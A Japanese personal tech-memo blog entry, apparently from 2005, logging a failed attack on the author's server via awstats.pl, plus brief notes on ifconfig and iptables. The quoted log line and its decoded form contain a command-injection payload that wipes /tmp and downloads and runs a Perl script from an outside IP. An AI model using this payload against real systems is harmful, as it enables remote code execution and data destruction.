僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。
awastats.pl を突いたのが来た。awstatsのディレクトリを
変えながら連続9回。
入れてないって言ってるのに。もう飽きてきた。
210.147.199.167 - - [22/Nov/2005:12:32:41 +0900] "\ GET //cgi-bin/awstats/awstats.pl?configdir=|echo%2\ 0;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://61.218\ .64.40/~www/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.\ pl*;echo| HTTP/1.1" 404 472 "-" "Mozilla/4.0 (comp\ atible; MSIE 6.0; Windows 98)
cd /tmp;rm -rf *; curl -O http://61.218.64.40/~www/a.pl; perl a.pl;echo ;rm -rf a.pl*;echo| HTTP/1.1
Linuxで"/"できるようになってたのか。
# ifconfig eth0 XXX.XXX.XXX.XXX/X # route add -net XXX.XXX.XXX.XXX/X gw XXX.XXX.XXX.XXX
-P INPUT、OUTPUT、FORWARDことごとく DROP しても DHCPはすり抜けるようだった。???
リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。